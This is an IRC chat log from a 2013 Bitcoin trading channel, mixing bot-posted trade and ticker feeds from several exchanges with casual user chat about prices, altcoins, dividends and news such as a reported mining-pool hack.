[ASICMINER-PT] 2 @ 1.1415 = 2.283 BTC [-] Apr 23 23:12:21 [MPEX] [S.MPOE] 10112 @ 0.00068953 = 6.9725 BTC [-] Apr 23 23:12:23 [MPEX] [S.MPOE] 3458 @ 0.00067862 = 2.3467 BTC [-] Apr 23 23:24:16 [MPEX] [S.MPOE] 4250 @ 0.00067862 = 2.8841 BTC [-] Apr 23 23:34:31 [BTCTC] [S.MPOE-PT] 30 @ 0.000698 = 0.0209 BTC [+] Apr 23 23:34:59 [BTCTC] [BASIC-MINING] 3 @ 0.42 = 1.26 BTC [-] Apr 23 23:35:39 [BTCTC] [ASICMINER-PT] 1 @ 1.189 BTC [+] Apr 23 23:36:27 Anybody that trades BTC settled USD futures? Apr 23 23:39:37 [BTCTC] [BASIC-MINING] 3 @ 0.41101 = 1.233 BTC [-] Apr 23 23:39:58 [BTCTC] [BASIC-MINING] 1 @ 0.411 BTC [-] Apr 23 23:40:37 [BTCTC] [BASIC-MINING] 5 @ 0.40701 = 2.0351 BTC [-] Apr 23 23:40:48 aneesh? Apr 23 23:41:20 [BTCTC] [BASIC-MINING] 1 @ 0.407 BTC [-] Apr 23 23:42:03 [HAVELOCK] [HIM] 1 @ 1.87 BTC [+] Apr 23 23:42:10 [BTCTC] [ASICMINER-PT] 1 @ 1.196999 BTC [+] Apr 23 23:42:44 [BTCTC] [ASICMINER-PT] 1 @ 1.197 BTC [+] Apr 23 23:43:20 [BTCTC] [ASICMINER-PT] 1 @ 1.19898 BTC [+] Apr 23 23:50:09 [BTCTC] [BASIC-MINING] 1 @ 0.4389 BTC [+] Apr 23 23:50:17 ;;ticker Apr 23 23:50:18 BTCUSD ticker | Best bid: 139.80000, Best ask: 139.89000, Bid-ask spread: 0.09000, Last trade: 139.80000, 24 hour volume: 95450.29604973, 24 hour low: 124.97000, 24 hour high: 139.81000, 24 hour vwap: 131.93442 Apr 23 23:54:52 [MPEX] [S.MPOE] 7000 @ 0.00068389 = 4.7872 BTC [+] Apr 24 00:08:12 [BTCTC] [COGNITIVE] 1 @ 0.1982 BTC [+] Apr 24 00:10:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 24 00:11:16 bless you Apr 24 00:12:19 hey truffles Apr 24 00:12:38 what about this fucking price? makes no sense. Apr 24 00:12:53 There are currently 0 bitcoins demanded at or over 160.0 USD, worth 0.0 USD in total. | Data vintage: 0.0057 seconds Apr 24 00:12:55 [BTCTC] [GSDPT] 1 @ 0.00379 BTC [+] Apr 24 00:13:03 not there yet Apr 24 00:14:38 just wondering who is buying it all. is it you? Apr 24 00:15:07 ;;ticker Apr 24 00:15:08 BTCUSD ticker | Best bid: 140.47161, Best ask: 141.18999, Bid-ask spread: 0.71838, Last trade: 141.19000, 24 hour volume: 100722.28543688, 24 hour low: 124.97000, 24 hour high: 142.48750, 24 hour vwap: 132.67953 Apr 24 00:16:31 [BTCTC] [B.YABMC] 3 @ 0.0165 = 0.0495 BTC [-] Apr 24 00:17:43 [BTCTC] [COGNITIVE] 2 @ 0.1982 = 0.3964 BTC [+] Apr 24 00:18:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 24 00:52:25 ;;ticker Apr 24 00:52:26 BTCUSD ticker | Best bid: 139.31501, Best ask: 139.99999, Bid-ask spread: 0.68498, Last trade: 139.31501, 24 hour volume: 103242.27631667, 24 hour low: 124.97000, 24 hour high: 142.48750, 24 hour vwap: 133.14191 Apr 24 01:07:59 ;;ticker Apr 24 01:08:00 BTCUSD ticker | Best bid: 143.01901, Best ask: 143.92000, Bid-ask spread: 0.90099, Last trade: 143.92000, 24 hour volume: 105875.88906638, 24 hour low: 124.97000, 24 hour high: 143.00000, 24 hour vwap: 133.42108 Apr 24 01:08:04 breakout Apr 24 01:10:13 ;;bc,convert eur Apr 24 01:10:14 1 BTC = 143.92000 U.S. dollars = 110.852653 Euros Apr 24 01:11:04 [HAVELOCK] [SDICE] 1 @ 0.3033 BTC [+] Apr 24 01:22:03 [HAVELOCK] [VTX] 8 @ 0.49701111 = 3.9761 BTC [+] Apr 24 01:24:04 [HAVELOCK] [VTX] 3 @ 0.4973 = 1.4919 BTC [+] Apr 24 01:31:28 lol, Ron Paul on Bitcoin "I admit, I do not fully understand what is going on with it." Apr 24 01:31:33 http://www.zerohedge.com/news/2013-04-23/ron-paul-bitcoin-if-i-cant-put-it-my-pocket-i-have-reservations Apr 24 01:35:40 [BTCTC] [COGNITIVE] 3 @ 0.1982 = 0.5946 BTC [+] Apr 24 01:38:56 ya well Apr 24 01:38:58 old people Apr 24 01:39:00 [MPEX] [S.MPOE] 11150 @ 0.00068176 = 7.6016 BTC [-] Apr 24 01:39:03 nothing you can do. Apr 24 01:39:15 he's tired like bill cosby Apr 24 01:46:12 [MPEX] [S.MPOE] 601 @ 0.00067862 = 0.4079 BTC [-] Apr 24 01:46:14 [MPEX] [S.MPOE] 6321 @ 0.00067861 = 4.2895 BTC [-] Apr 24 01:46:14 [MPEX] [S.MPOE] 5628 @ 0.00067783 = 3.8148 BTC [-] Apr 24 01:49:47 god dammit ron paul Apr 24 01:53:18 http://cluborlov.blogspot.com/2013/04/the-rationale-behind-boston-psy-ops.html Apr 24 01:54:36 what'd ron paul do? Apr 24 01:54:57 00:31.26 ( pizzaman1337 ) lol, Ron Paul on Bitcoin "I admit, I do not fully understand what is going on with it." Apr 24 01:54:57 00:31.31 ( pizzaman1337 ) http://www.zerohedge.com/news/2013-04-23/ron-paul-bitcoin-if-i-cant-put-it-my-pocket-i-have-reservations Apr 24 02:06:15 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 24 02:07:04 [HAVELOCK] [VTX] 1 @ 0.4973 BTC [+] Apr 24 02:10:04 the nice thing about ron paul is that he's willing to say "i don't know" Apr 24 02:17:25 admirable indeed Apr 24 02:22:44 [MPEX] [S.MPOE] 1294 @ 0.00067783 = 0.8771 BTC [-] Apr 24 02:22:46 [MPEX] [S.MPOE] 3306 @ 0.00067594 = 2.2347 BTC [-] Apr 24 02:25:38 oh geez wtf is a feathercoin Apr 24 02:26:32 http://html5.org/tools/web-apps-tracker?from=7849&to=7850 Apr 24 02:27:56 https://bitcointalk.org/index.php?topic=178286.0 Apr 24 02:28:04 [HAVELOCK] [HIM] 2 @ 1.87 = 3.74 BTC [+] Apr 24 02:30:04 [HAVELOCK] [VTX] 2 @ 0.4973 = 0.9946 BTC [+] Apr 24 02:46:54 [BTCTC] [ASICMINER-PT] 1 @ 1.1998 BTC [-] Apr 24 02:47:04 [BTCTC] [ASICMINER-PT] 1 @ 1.1999 BTC [+] Apr 24 02:47:08 [BTCTC] [ASICMINER-PT] 8 @ 1.2 = 9.6 BTC [+] Apr 24 02:47:12 [BTCTC] [ASICMINER-PT] 9 @ 1.2 = 10.8 BTC [+] Apr 24 02:47:32 ;;calc 452.55335592 * [ticker --last] Apr 24 02:47:33 64715.1298966 Apr 24 02:48:07 ;;calc 452.55335592 * 500 Apr 24 02:48:08 226276.67796 Apr 24 02:48:24 jcpham https://bitcointalk.org/index.php?topic=175413.msg1925482#msg1925482 Apr 24 02:48:28 i guess you win ? Apr 24 02:51:19 lol Apr 24 02:51:21 oh man Apr 24 02:52:32 the true reason bitcoin shot from two to three digits Apr 24 02:52:45 is that we've managed to switch from a drama powered to a drama-and-comedy-gold powered model. Apr 24 02:53:42 I am sure Mark's build and voice are playing into this rally Apr 24 02:54:27 Augustus Gloop Apr 24 02:54:27 this "Synthetic Commodity Money" "paper" is singurarly ignorant/uninformed/unscientific/laughable and ridiculous Apr 24 02:54:47 sometimes i wonder if humanities departments have ever read an actual scientific paper. Apr 24 02:55:23 I haven't read the paper. Apr 24 02:56:28 well... ok, formally : it contains no tables and a total of 3 figures in 28 pages. the third is a 100px wide rendition of the "bitcoin supply schedule" in 6 data points. Apr 24 02:56:42 the 2nd is a 100px wide rendition of the "swiss dinar"/usd rate Apr 24 02:56:50 (ie, the iraq pre-1990 currency) Apr 24 02:57:37 Academic papers on bitcoin don't make sense to me. If you had actually figured out something of value, why wouldn't you just try to profit from it Apr 24 02:57:51 Unless you already have positioned yourself I guess Apr 24 02:57:52 they could be descriptive and that'd be fine Apr 24 02:57:54 or you are broke Apr 24 02:58:04 probably most are broke Apr 24 02:58:30 mircea_popescu: is there a cabal that are manipulating bitcoin prices? Apr 24 02:58:51 not rly. Apr 24 02:58:58 damn. Apr 24 03:03:04 [HAVELOCK] [VTX] 2 @ 0.4973 = 0.9946 BTC [+] Apr 24 03:08:09 truffles: Im that kind of people Apr 24 03:09:14 so there's not one but actually two different doods doing a bitcoin pixel page + bitcoin gem thing Apr 24 03:09:29 and they're both equally incapable of reading comprehension. Apr 24 03:09:50 i wonder if it actually is the same dood with a split personality. Apr 24 03:11:10 mircea_popescu: re: USA: http://cluborlov.blogspot.com/2013/04/the-rationale-behind-boston-psy-ops.html Apr 24 03:11:42 "Under the thinnest of pretenses, Boston was placed under martial law, with heavily armed troops patrolling the streets, pointing machine guns at civilians who dared so much as to look out their windows." Apr 24 03:11:49 that was some small sattelite town neh ? Apr 24 03:13:16 murca Apr 24 03:16:44 12 million devcoin auction: https://bitcointalk.org/index.php?topic=185897.0 Apr 24 03:17:28 what does one do with those? Apr 24 03:17:38 worship Apr 24 03:18:16 devilcoin from diablo Apr 24 03:18:32 [02:27] https://bitcointalk.org/index.php?topic=178286.0 Apr 24 03:18:34 fuck is this Apr 24 03:18:46 kakobrekla: its used to donate to open source projects Apr 24 03:18:48 dude does a verbatim copy of litecoin and it gets 50 pages of replies in a week? Apr 24 03:18:54 lol... Apr 24 03:19:01 donate them then Apr 24 03:19:19 " Litecoin being as mature as it is makes it hard to join in the fun so let’s start with a new coin that follows Litecoin’s tradition." Apr 24 03:19:25 this logic. i don't follow it natively. Apr 24 03:19:31 is it for a different neural architecture ? Apr 24 03:19:51 Scrat: wait till he puts up an exchange and 'feathercoin' starts having a positive cash value... 'a sucker's born every minute, and two to take him,' etc. Apr 24 03:20:06 we need gnatcoin Apr 24 03:20:13 picocoin Apr 24 03:22:03 truffles: you can use all the altcoin you want, and nobody will hate you. just as nobody hates that guy who sawed off his arms with a chainsaw in a hardware store. Apr 24 03:23:02 altcoins are a mechanism for siphoning value from chumps, strictly of the volunteer variety. Sort of like SDICE. Apr 24 03:23:26 well, lets take advantage of it? Apr 24 03:23:28 Im hoping that btc reaches 500 Apr 24 03:23:29 assetcoin Apr 24 03:23:30 asscoin Apr 24 03:23:40 then I'll be able to afford to start dmc 2.0 Apr 24 03:23:41 i have a completely abstract altchain. nobody mines on it, nobody owns any coins, nobody bothers to read the codebase (which doesn't actually exist in written form anywhere) Apr 24 03:23:54 mircea_popescu: SlaveCoin? Apr 24 03:23:59 but since userbase minerbase coderbase etc aren't the criteria by which we judge altcoins... Apr 24 03:24:05 mine is just as good as all the others. Apr 24 03:24:19 haha Apr 24 03:24:36 mental experiment ftw. Apr 24 03:25:51 not that it is physically impossible to steal Bitcoin's Schelling Point status, but you would have to actually add something astonishingly interesting, vs. merely swapping out the genesis block and finding a catchy name. Apr 24 03:25:55 y not asscoin? http://www.youtube.com/watch?v=DO1Q7F23DxM Apr 24 03:27:00 I'm especially amused at the altcoin authors who add demurrage/inflation. Because clearly, everybody loves money that rots away. Apr 24 03:27:01 nobody has yet found a catchy name. Apr 24 03:27:18 asciilifeform kruger'd use it. Apr 24 03:27:48 or i mean krugman. or what's the monkey;s name Apr 24 03:27:56 [20:23] i have a completely abstract altchain. nobody mines on it, nobody owns any coins, nobody bothers to read the codebase (which doesn't actually exist in written form anywhere) Apr 24 03:28:11 mircea_popescu: if by "use" you mean "try to force others to use at gunpoint", then perhaps. Apr 24 03:28:17 That Apr 24 03:28:55 i thot guns were bad mmkay. Apr 24 03:29:23 http://2.bp.blogspot.com/-50mdxj627-g/UXV1m9uPK2I/AAAAAAAAEd0/vW7MgT1U4PA/s1600/police-state.jpg Apr 24 03:32:00 stop racistly holding the president's baseless/meaningless generalisations against him! Apr 24 03:33:16 http://www.zerohedge.com/news/2013-04-23/ap-reports-two-explosions-white-house-obama-injured Apr 24 03:33:19 this is kinda lulzy. Apr 24 03:33:44 "we've been hacked" = "we're retarded and don't understand anything about computers, the internet or security" Apr 24 03:34:41 mircea_popescu: "we've been hacked" = "somebody on the staff knew exactly when to short a bunch of stocks." Apr 24 03:34:56 eh get out Apr 24 03:35:10 nobody cares what "the press" says since about 2006 or so Apr 24 03:35:35 evidently a bunch of algo traders' idiot code does indeed care. Apr 24 03:35:58 the crash happened within seconds, not hours Apr 24 03:36:30 i'd proposed the events are thoroughly unrelated. Apr 24 03:37:02 mircea_popescu: maybe this time, but not the next. Apr 24 03:52:55 slush got hacked Apr 24 03:53:07 huh? Apr 24 03:53:17 plenty of trade algos scan twitter to drive their engine these days Apr 24 03:53:29 I assume Apr 24 03:53:32 slush got hacked .took down the pool and servers Apr 24 03:53:37 The idea has been aroudn for years Apr 24 03:53:40 wallet Apr 24 03:53:52 would not be suprising if it was algo driven Apr 24 03:57:16 Bugpowder: the correction was probably algo-driven as well, considering the speed. Apr 24 03:58:25 "IF twitter(whitehouse exploded) THEN short" is as easy to write as "IF twitter(whitehouse exploded) THEN dump" Apr 24 03:58:29 smoeone at GS had a new Ferrari to buy Apr 24 03:59:10 well maybe a new yacht Apr 24 04:02:09 jborkl_ link ? Apr 24 04:04:33 slush got owned by OVH (or so he claims) https://bitcointalk.org/index.php?topic=1976.msg1925445#msg1925445 Apr 24 04:10:54 insider job huh Apr 24 04:15:04 [HAVELOCK] [VTX] 10 @ 0.4975 = 4.975 BTC [+] Apr 24 04:16:04 [HAVELOCK] [VTX] 1 @ 0.4975 BTC [+] Apr 24 04:22:22 poor slush. Apr 24 04:34:03 [HAVELOCK] [VTX] 25 @ 0.4974955 = 12.4374 BTC [-] Apr 24 04:34:59 [MPEX] [S.MPOE] 5500 @ 0.00068028 = 3.7415 BTC [+] Apr 24 04:41:03 [HAVELOCK] [VTX] 25 @ 0.4974955 = 12.4374 BTC [-] Apr 24 04:41:04 [HAVELOCK] [VTX] 4 @ 0.4975 = 1.99 BTC [+] Apr 24 04:41:06 [HAVELOCK] [VTX] 3 @ 0.4975 = 1.4925 BTC [+] Apr 24 04:51:56 [MPEX] [S.MPOE] 3128 @ 0.00067594 = 2.1143 BTC [-] Apr 24 04:52:04 [MPEX] [S.MPOE] 13973 @ 0.00067352 = 9.4111 BTC [-] Apr 24 04:52:08 [MPEX] [S.MPOE] 16400 @ 0.00066835 = 10.9609 BTC [-] Apr 24 04:52:10 [MPEX] [S.MPOE] 2200 @ 0.00066267 = 1.4579 BTC [-] Apr 24 04:52:13 [MPEX] [S.MPOE] 10500 @ 0.00065959 = 6.9257 BTC [-] Apr 24 04:57:49 [BTCTC] [COGNITIVE] 1 @ 0.1982 BTC [+] Apr 24 04:59:26 ;;bc,stat Apr 24 04:59:27 ;;bc,stats Apr 24 04:59:27 Error: "bc,stat" is not a valid command. Apr 24 04:59:30 Current Blocks: 232839 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1016 blocks | Next Difficulty In About: 5 days, 22 hours, 35 minutes, and 47 seconds | Next Difficulty Estimate: 9780242.39957 | Estimated Percent Change: 8.98061 Apr 24 05:15:03 [HAVELOCK] [HIM] 1 @ 1.8003 BTC [-] Apr 24 05:16:04 [HAVELOCK] [VTX] 1 @ 0.4502 BTC [-] Apr 24 05:19:12 zhoutong now likes mpex Apr 24 05:20:48 he is also accepting donations for his future bitcoin projects. Apr 24 05:34:05 [BTCTC] [ASICMINER-PT] 1 @ 1.22888 BTC [+] Apr 24 05:36:25 yeah lol Apr 24 05:36:54 and unfortunatly lost touch with his imaginary friend Apr 24 05:40:04 ;;calc 452.55335592 * [ticker --last] Apr 24 05:40:07 64527.6596689 Apr 24 05:40:09 ;;ticker --last Apr 24 05:40:10 142.58575 Apr 24 05:44:52 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] Apr 24 05:46:00 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] Apr 24 05:47:46 [BTCTC] [ASICMINER-PT] 1 @ 1.22889 BTC [+] Apr 24 05:48:24 [BTCTC] [COGNITIVE] 2 @ 0.1982 = 0.3964 BTC [+] Apr 24 06:20:28 [MPEX] [S.MPOE] 3399 @ 0.00065893 = 2.2397 BTC [-] Apr 24 06:20:30 [MPEX] [S.MPOE] 9801 @ 0.00065934 = 6.4622 BTC [+] Apr 24 06:21:35 test Apr 24 06:23:10 test Apr 24 06:25:05 test Apr 24 06:25:18 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:20 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:22 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:24 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:26 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:28 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:30 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:32 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:34 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:35 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:37 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:39 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:41 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:43 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:45 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:47 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:25:56 ops. Apr 24 06:26:01 WTF? Apr 24 06:26:11 twas 1 trade Apr 24 06:26:12 ... Apr 24 06:26:17 yeah, that's odd Apr 24 06:26:36 ya im fixing one thing and broke another Apr 24 06:26:43 such is life. Apr 24 06:27:15 stop breaking things kakobrekla Apr 24 06:27:17 I mean mircea_popescu Apr 24 06:27:24 since you guys switch places every week Apr 24 06:29:37 oh well im retarded is all. Apr 24 06:32:22 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:32:24 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:32:26 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:32:31 hahaha Apr 24 06:32:35 told ya Apr 24 06:32:36 "okay take it offline" Apr 24 06:34:36 meh Apr 24 06:34:48 ill finish tomorrow, its too late Apr 24 06:34:59 if it ain't broke don't fix it Apr 24 06:35:02 what time is it there Apr 24 06:35:03 [MPEX] [S.MPOE] 14800 @ 0.00065934 = 9.7582 BTC [+] Apr 24 06:35:04 [MPEX] [S.MPOE] 7359 @ 0.00065934 = 4.8521 BTC [+] Apr 24 06:35:05 like 5am? Apr 24 06:35:10 5.35 Apr 24 06:35:25 you mean it's too early? Apr 24 06:35:51 both Apr 24 06:39:03 this kind of rules: http://thefuckingbitcoin.com/ Apr 24 06:41:04 [HAVELOCK] [HIM] 1 @ 1.8002 BTC [-] Apr 24 06:41:05 [HAVELOCK] [HIM] 1 @ 1.80020001 BTC [+] Apr 24 06:42:30 PANIC SELL Apr 24 06:42:32 PANIC SELL Apr 24 06:42:32 lol Apr 24 06:56:08 Bugpowder Bugpowder Bugpowder Apr 24 06:56:32 beetlejuice Apr 24 06:56:40 price action is redic Apr 24 06:59:03 [BTCTC] [GSDPT] 69 @ 0.00351 = 0.2422 BTC [-] Apr 24 07:20:25 I'm glad you got my reference Bugpowder Apr 24 07:20:50 I was summond Apr 24 07:21:12 April '13 vs November '12/December '12 def Apr 24 07:21:33 but even Early April '13 vs Late April '13... Apr 24 07:21:51 Late April being the time we are in now DA PRESENT Apr 24 07:24:36 I give up Apr 24 07:24:47 I made the mistake of trading it Apr 24 07:24:54 now I'm just holding and sitting tight Apr 24 07:44:33 [BTCTC] [GSDPT] 100 @ 0.003501 = 0.3501 BTC [-] Apr 24 07:59:30 Bugpowder Bugpowder Bugpowder ! Apr 24 07:59:32 lol Apr 24 07:59:36 sup Apr 24 07:59:37 which way is the price going to go? Apr 24 07:59:38 XD Apr 24 07:59:44 I am all in Apr 24 07:59:46 You are the price oracle Apr 24 07:59:54 So when will it fall again? Apr 24 07:59:57 uhhh Apr 24 08:00:04 either soon, or later Apr 24 08:00:21 if we hit 149.9, we go thru though Apr 24 08:00:24 I think Apr 24 08:00:25 Bulls use media blitz to increase price, bears used ddos to sell down Apr 24 08:00:36 what will bears us next? Apr 24 08:00:39 Bulls use ddos to buy dips Apr 24 08:00:51 Yah. Apr 24 08:01:03 I got filled at 111 on the last ddos, was sweet Apr 24 08:01:09 Me too! Apr 24 08:01:10 I got 110 Apr 24 08:01:13 lol Apr 24 08:01:28 i've been throwing orders into campbx via python terminals Apr 24 08:03:05 kewl Apr 24 08:03:12 I should set goxtool up Apr 24 08:03:34 you trade through the site? Apr 24 08:03:34 though TBH the best strat really would have been to buy and hold Apr 24 08:03:38 that's horrendous... Apr 24 08:03:43 yes Apr 24 08:03:48 I am dumb Apr 24 08:03:58 but you make so much money on your strats Apr 24 08:04:03 you is da warren buffet of bitcoin Apr 24 08:04:06 (early years) Apr 24 08:04:52 I would have made more if I had just sat on my buys at 52 and 51. Apr 24 08:04:57 much more Apr 24 08:05:06 trading is stupid Apr 24 08:05:12 but I'm doing it anyway Apr 24 08:05:17 cause no options :( Apr 24 08:06:05 Then wait until next month Apr 24 08:06:20 Or buy N's and just hold for a long ass time Apr 24 08:06:30 the price is too high Apr 24 08:06:34 !ticker m ^OIX Apr 24 08:06:35 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 24 08:06:35 can't make money on them Apr 24 08:07:14 then sell and take a position to keep the price stable win-win :P Apr 24 08:07:21 err underwrite Apr 24 08:07:23 MKOPT yo Apr 24 08:07:37 mebby Apr 24 08:08:21 I hate to complain but I was dumb Apr 24 08:08:34 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 54.6290 seconds Apr 24 08:08:35 and didn't buy back puts as the price fell to hedge my short P80's Apr 24 08:08:37 There are currently 184011.53 bitcoins demanded at or over 50.0 USD, worth 16399606.4212 USD in total. | Data vintage: 57.7002 seconds Apr 24 08:08:50 There are currently 51900.191 bitcoins offered at or under 200.0 USD, worth 8651680.4235 USD in total. | Data vintage: 70.2018 seconds Apr 24 08:08:58 There are currently 33335168 bitcoins demanded at or over 0.0 USD, worth 22625710.7287 USD in total. | Data vintage: 78.1412 seconds Apr 24 08:09:54 tiberiusiv is a secret mpex user Apr 24 08:10:00 that's why he trolls mpex so much Apr 24 08:14:32 [MPEX] [S.MPOE] 24650 @ 0.00065511 = 16.1485 BTC [-] Apr 24 08:21:40 [BTCTC] [ASICMINER-PT] 5 @ 1.155 = 5.775 BTC [-] Apr 24 08:21:44 [BTCTC] [ASICMINER-PT] 1 @ 1.150014 BTC [-] Apr 24 08:21:52 [BTCTC] [ASICMINER-PT] 3 @ 1.150013 = 3.45 BTC [-] Apr 24 08:22:01 [BTCTC] [ASICMINER-PT] 1 @ 1.150013 BTC [-] Apr 24 08:22:04 [BTCTC] [ASICMINER-PT] 5 @ 1.145 = 5.725 BTC [-] Apr 24 08:22:12 [BTCTC] [ASICMINER-PT] 1 @ 1.14301 BTC [-] Apr 24 08:22:16 [BTCTC] [ASICMINER-PT] 2 @ 1.142 = 2.284 BTC [-] Apr 24 08:22:19 [BTCTC] [ASICMINER-PT] 2 @ 1.14125 = 2.2825 BTC [-] Apr 24 08:22:22 [BTCTC] [ASICMINER-PT] 1 @ 1.14121 BTC [-] Apr 24 08:22:25 [BTCTC] [ASICMINER-PT] 2 @ 1.14105 = 2.2821 BTC [-] Apr 24 08:22:33 [BTCTC] [ASICMINER-PT] 5 @ 1.14101 = 5.7051 BTC [-] Apr 24 08:22:36 [BTCTC] [ASICMINER-PT] 2 @ 1.1 = 2.2 BTC [-] Apr 24 08:22:44 [BTCTC] [ASICMINER-PT] 5 @ 1.08051 = 5.4026 BTC [-] Apr 24 08:22:48 [BTCTC] [ASICMINER-PT] 2 @ 1.0805 = 2.161 BTC [-] Apr 24 08:22:51 [BTCTC] [ASICMINER-PT] 1 @ 1.0805 BTC [-] Apr 24 08:22:54 [BTCTC] [ASICMINER-PT] 15 @ 1.08 = 16.2 BTC [-] Apr 24 08:22:57 [BTCTC] [ASICMINER-PT] 10 @ 1.07 = 10.7 BTC [-] Apr 24 08:23:01 [BTCTC] [ASICMINER-PT] 4 @ 1.05 = 4.2 BTC [-] Apr 24 08:23:04 [BTCTC] [ASICMINER-PT] 5 @ 1.046 = 5.23 BTC [-] Apr 24 08:23:14 [BTCTC] [ASICMINER-PT] 2 @ 1.045 = 2.09 BTC [-] Apr 24 08:23:23 [BTCTC] [ASICMINER-PT] 4 @ 1.03 = 4.12 BTC [-] Apr 24 08:23:30 [BTCTC] [ASICMINER-PT] 2 @ 1.0103 = 2.0206 BTC [-] Apr 24 08:23:38 [BTCTC] [ASICMINER-PT] 5 @ 1.0002 = 5.001 BTC [-] Apr 24 08:23:41 [BTCTC] [ASICMINER-PT] 11 @ 1.0001 = 11.0011 BTC [-] Apr 24 08:23:45 [BTCTC] [ASICMINER-PT] 10 @ 1 = 10 BTC [-] Apr 24 08:26:58 Woot Apr 24 08:27:01 buy asic miner! Apr 24 08:28:43 [BTCTC] [BASIC-MINING] 3 @ 0.3801 = 1.1403 BTC [-] Apr 24 08:39:11 yea now is a good time to buy Apr 24 08:39:18 anyone wanna loan me like .4 btc? :3 Apr 24 08:39:33 [BTCTC] [BASIC-MINING] 1 @ 0.3801 BTC [-] Apr 24 08:40:02 [BTCTC] [ASICMINER-PT] 1 @ 1.18499 BTC [+] Apr 24 08:40:08 [BTCTC] [ASICMINER-PT] 1 @ 1.185 BTC [+] Apr 24 08:40:45 ;;getrating inhies Apr 24 08:40:46 This user has not yet been rated. WARNING: Currently not authenticated. Apr 24 08:40:54 LOL :P Apr 24 08:41:29 [BTCTC] [ASICMINER-PT] 30 @ 1.18 = 35.4 BTC [-] Apr 24 08:41:33 im on otc Apr 24 08:41:35 as inh Apr 24 08:41:37 i just have to find that key Apr 24 08:41:43 it was like two years ago Apr 24 08:41:46 pretty sure i still have it Apr 24 08:41:58 ;;getrating inh Apr 24 08:41:58 WARNING: Currently not authenticated. User inh, rated since Thu May 12 17:15:32 2011. Cumulative rating 19, from 11 total ratings. Received ratings: 10 positive, 1 negative. Sent ratings: 10 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=inh Apr 24 08:42:01 [BTCTC] [ASICMINER-PT] 53 @ 1.18 = 62.54 BTC [-] Apr 24 08:42:06 lol Apr 24 08:42:42 not good enough? :( Apr 24 08:42:59 I barely have enough btc for myself Apr 24 08:43:12 its ok i dont really want to deal with a loan anyways Apr 24 08:43:22 i just want another asic mining share before divs pay out :3 Apr 24 08:43:48 the div is sooo small per share Apr 24 08:44:23 thats why every bit help Apr 24 08:44:26 s Apr 24 08:44:42 i still get abotu .1 btc when they pay out Apr 24 08:44:46 thats not too bad Apr 24 08:45:28 someone said they were dropping it to .07 Apr 24 08:46:07 :O Apr 24 08:46:09 well Apr 24 08:46:20 i meant that in total Apr 24 08:46:28 like last week i made .11 btc in divs with 16 shares Apr 24 08:46:44 ;;calc .11/16 Apr 24 08:46:45 0.006875 Apr 24 08:46:48 meh Apr 24 08:46:50 I'll pass Apr 24 08:46:54 heh Apr 24 08:46:58 HIM pays out more than that Apr 24 08:47:07 wassat? Apr 24 08:47:36 !ticker l HIM Apr 24 08:47:36 Stupid fucking white man. Apr 24 08:47:50 oh no you dint assbot Apr 24 08:48:36 !ticker j HIM Apr 24 08:48:36 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Apr 24 08:48:39 !ticker h HIM Apr 24 08:48:40 [HAVELOCK:HIM] 1D: 1.80020000 / 1.8364625 / 1.87000000 (8 shares, 14.69170001 BTC), 7D: 1.73000000 / 1.84405223 / 1.94000000 (114 shares, 210.22195372 BTC), 30D: 0.75000001 / 1.6621414 / 2.08000000 (796 shares, 1323.06455483 BTC) Apr 24 08:48:43 there you go Apr 24 08:48:51 pays out .013 I think Apr 24 08:49:12 goes up every month Apr 24 08:54:19 whioa wtf Apr 24 08:54:33 not bad Apr 24 08:55:34 can i only buy in to that on the havelock site? Apr 24 08:55:39 or is there a passtrhough or something? Apr 24 09:03:46 [BTCTC] [ASICMINER-PT] 7 @ 1.15 = 8.05 BTC [-] Apr 24 09:05:07 [BTCTC] [ASICMINER-PT] 1 @ 1.13 BTC [-] Apr 24 09:05:26 [BTCTC] [ASICMINER-PT] 9 @ 1.13 = 10.17 BTC [-] Apr 24 09:13:54 [BTCTC] [ASICMINER-PT] 1 @ 1.120011 BTC [-] Apr 24 09:13:58 [BTCTC] [ASICMINER-PT] 4 @ 1.12 = 4.48 BTC [-] Apr 24 09:14:10 [BTCTC] 